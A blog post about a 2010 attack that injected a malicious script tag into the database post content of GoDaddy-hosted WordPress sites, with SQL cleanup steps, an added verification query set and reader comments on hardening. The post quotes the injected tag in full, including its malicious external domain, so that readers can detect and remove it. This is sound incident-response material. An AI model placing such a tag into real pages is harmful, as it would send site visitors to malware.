GoDaddy Targeted Once Again – WordPress Hacked
GoDaddy is perhaps the favorite target of hackers these days because of their size and their delightful tendency not to keep their security correctly enforced.
Beginning approximately December 21st, 2010, WordPress sites hosted on GoDaddy (and GoDaddy resellers) were again attacked and compromised.
Rather than the usual file-level code injection, which is all too common but generally not hard to clean up, this attack inserted a script tag into the post content stored in the database.
Signs & Symptoms
For infected sites, the homepage looks unaffected, but opening any post redirects the visitor to one of the many notorious “Fake Antivirus” sites (that are themselves malware).
Not cool!
You can find out if your site is infected by going to your dashboard, opening any of your posts in the HTML tab of the editor, and scrolling to the bottom. If you see this line (the quotes are plain double quotes; WordPress may display them as curly ones), you’re affected:
<script src="http://acrossuniverseitbenet.com/js.php?kk=10"></script>
(Please don’t go opening that link)
I’ve been monitoring the attack and helping with cleanups since December 22nd.
Cleanup Routine
Because this is not a typical code injection attack, it does not call for the usual overlay upgrade (re-uploading the WordPress core files over the existing install) that we use to clear that type.
If your site is currently infected, the first thing to do is notify GoDaddy of the infection so that they can run their own script against your site when they get to you in the queue.
However, most of us want our sites up faster than a host that is trying to clean up thousands of sites can accommodate, so here are your next steps…
Steps
You have to remove these malicious entries from each and every post of an infected site.
While it’s long and tedious, the average blogger can do this themselves, re-saving each post after removing the injected script.
For those comfortable with it however, there is a much faster way to clean up these sites.
Step 1: Put your blog into maintenance mode so your visitors and search engines don’t get sent to the redirect page. There are a dozen maintenance mode plugins in the plugin directory, and most are about as good as the next for this; just find a highly rated one that supports WP 3.0. Do this step even if you do not have time to clean up the site immediately.
Step 2: Now we need to access your site’s database. This can be done either from your hosting control panel’s database tools or with a plugin called WP-phpMyAdmin.
Step 3: If using the plugin, go to Tools -> phpMyAdmin and click SQL in the top menu of the plugin interface. Run this SQL command (type the quotes as plain ASCII quotes, not the curly quotes WordPress displays, and replace the wp_ prefix if you changed it when you installed):
UPDATE wp_posts SET post_content = REPLACE(post_content, '<script src="http://acrossuniverseitbenet.com/js.php?kk=10"></script>', '');
REPLACE only removes that exact string, so a post carrying a differently written copy of the tag will not be touched by it; that is why the next step matters.
Step 4: Re-check a few posts to be sure they are clear of the script code. Assuming they look clean (and they should), you are safe to deactivate the maintenance mode plugin.
Step 5: Consider whether hosting with GoDaddy, and continuing to deal with WordPress-related malware and configuration issues, remains a viable solution for your site. I highly prefer, recommend and am an affiliate for HostGator hosting.
Please do not skip the step of contacting GoDaddy, as they still need to do a check at their level to ensure they solve HOW they left you vulnerable.
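The check from Signs & Symptoms and the cleanup query from Step 3, run together as one phpMyAdmin session. This is an added example, not from the original post and not GoDaddy’s or Sucuri’s cleanup script. It assumes MySQL (which is what sits behind phpMyAdmin) and the default wp_ table prefix; the injected tag is the one quoted above, written with plain ASCII double quotes. The count and verify queries go beyond the original UPDATE: they measure the infection before anything is changed and list rows that reference the same domain with a different kk= value or different quoting, which an exact REPLACE would leave behind.

```sql
-- Added example: count, clean, verify.  Not code from the original post.
-- Assumes MySQL and the default wp_ prefix; change wp_posts if your prefix differs.

-- 1. Measure first: rows carrying the exact injected tag vs. any reference to the domain.
--    SUM over a LIKE comparison counts the rows where it is true.
SELECT
  SUM(post_content LIKE '%<script src="http://acrossuniverseitbenet.com/js.php?kk=10"></script>%') AS exact_tag,
  SUM(post_content LIKE '%acrossuniverseitbenet.com%')                                            AS any_reference,
  COUNT(*)                                                                                         AS total_rows
FROM wp_posts;

-- 2. Strip the exact tag from every row that carries it (posts, pages and revisions alike).
--    The WHERE clause keeps the "affected rows" count phpMyAdmin reports comparable to exact_tag above.
UPDATE wp_posts
SET post_content = REPLACE(
  post_content,
  '<script src="http://acrossuniverseitbenet.com/js.php?kk=10"></script>',
  ''
)
WHERE post_content LIKE '%<script src="http://acrossuniverseitbenet.com/js.php?kk=10"></script>%';

-- 3. Verify: any row still listed here holds a differently written copy of the tag.
SELECT ID, post_type, post_status, post_title
FROM wp_posts
WHERE post_content LIKE '%acrossuniverseitbenet.com%';
```

Run the three statements one after another from the SQL tab. If step 3 still returns rows after the UPDATE, open those posts in the HTML editor and look at what is actually there rather than guessing at a second REPLACE string; a row whose post_type is revision is harmless to leave but just as easy to clean.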
Thanks
Special thanks to Sucuri for sounding the original alarm and to HowToMakeMyBlog for the plugin suggestion that makes this easy for the average user to fix themselves.
Summary
I know that Christmas is not a day you want to deal with this type of headache (is there ever really a day?), but please be sure to give your site a quick check to ensure you do not leave it sitting infected all weekend, as the SEO and credibility impacts would be painful.
There is some additional discussion and questions about this attack going on in my Facebook thread where I announced this issue on Thursday. Please give it a read if you’re looking for a quick answer, but I do not suggest replying there, as I will not get notifications that you have commented and will not be able to follow up with you.
Have a Happy, Prosperous and SAFE Holidays!
Kimberly
PS: As usual, if you need help, let me know!
Hello Kim and All,
Just a quick thing about installing open source software: the most common initial security step missed by most people, which makes it easier for hackers to compromise your install.
1. Installing to the DEFAULT location.
Running a home development server myself that I sometimes open to the internet, I can tell you from personal experience, looking at my access logs, that once an IP is found, the FIRST thing a hacker will do is run a script checking for the most COMMON default software installation paths. I know about a month ago I had one hit my server here at home, and they ran every default install pathway of phpMyAdmin from around 1.5 through the present at 2.x. ALWAYS ALWAYS ALWAYS install to a different folder, and make that folder somewhat obscure in name if you can.
2. Leaving the default table prefixes during install.
Once again, this is yet ANOTHER very bad idea because it gives the hackers another piece of information to compromise your software. By changing the default table prefixes, in the software that allows it, you take one of those pieces of information away from them. It’s an easy way to add another “pseudo security” layer like 1 above.
3. Leaving admin pages at default names if software allows you to change them.
Once again, from past experience (I can’t speak for WordPress), other software I’ve installed on sites did allow for renaming the admin index page to something other than admin.php. If you have the option, always do this as well.
Anyways, those are just three common things off the top of my head that I can think of to make the script kiddies’ lives just a bit more difficult. However, the bottom line is simple. If they are good and they want in, eventually they will find a way. Most of that has to do with the target’s prominence and whether or not they feel the information within the database holds any potential value. The more reputation you have, the more visitors you have, the more chances you could become a target.
Forgot in the last post. One other REALLY important one is choosing your theme. Although many open source software solutions have a wealth of templates and well-meaning community members, if the theme developer failed to code the theme for security, then that will potentially open up your software to injection and other nasty hack attempts. One of the biggest things to look for in themes, which most who develop them without practicing secure coding will not even be able to answer, is to find out if the theme code “sanitizes” form data. Another form of “sanitizing” code is through internal code that links URLs as well. You know, those auto-generated links on your WordPress blog? Core code should “sanitize” and remove potential injection attacks through links entered in the browser window as well.
The two biggest vulnerability points to any online website are URL injection and database injection. Through “sanitizing” comment forms, email forms, list building forms, URL links, etc., through the code, it lessens the chance for such hacking attacks against your website. Just some brief security 101 for the readers here at Just Ask Kim.
Another way to attack sites is through cross scripting attempts. This is a situation where a person uploads code to another site that then does the above through the code on another site instead of directly on your site, through the url or the forms. Again, core software code, that blocks all code outside of the software needed code parameters, within your install, is a good front line to preventing such attacks. I can’t speak so much for WordPress, maybe Kim can.
Oh my, I had no idea GoDaddy was so vulnerable. Let me see, I don’t have anything hosted on their servers. Matter of fact, I only have 4 domains purchased from them but MANY purchased from one of their resellers.
You are providing such good info. I am really glad to have found your blog.
Hey Greg, there is no danger in purchasing domains from GoDaddy (or resellers), only in purchasing the hosting from either. It’s the hosting servers that they refuse to take care of and let get into a vulnerable state, and then all their customers pay the price. Their hosting’s cheap until you gotta pay someone to help you clean up or waste a bunch of time doing it yourself. I’m glad to hear you’re hosted elsewhere! Thanks for taking the time to comment, I appreciate it.
Kimberly
My site hosted by GoDaddy was one that was compromised. I immediately contacted GoDaddy and they provided no assistance and essentially told me it was up to me to keep my site safe. I am now looking at other hosting options.
Hey blkcatgal, I totally feel ya on that. They have been notoriously problematic to their customers. I highly recommend HostGator, but Bluehost/HostMonster is good too. It’s a shame that GoDaddy can’t take care of their servers… and can’t take care of customers when things happen. Be sure wherever you move that you select a host that is optimized for WordPress, as this will give you the best long-term results and stability as your site grows. Hang in there, I know this has to be crazy stressful; if you need a hand with anything, give me a shout.
Kim
I use Godaddy but not for hosting my website. More for just forwarding my domains to another host. I actually use a free wordpress host dreamhostapps.com. So far they are pretty good.
Hey Crystal, thanks for giving me a heads-up to look into dreamhostapps; they appear to likely be a WP Multi-Site install, but I’m not real sure. Going to be fun to poke around and see what they’re doing. Just having your domain name with GoDaddy is no risk, and I recommend them for domains as their domain management tools are very nice. Glad to hear you are probably safe.
Kimberly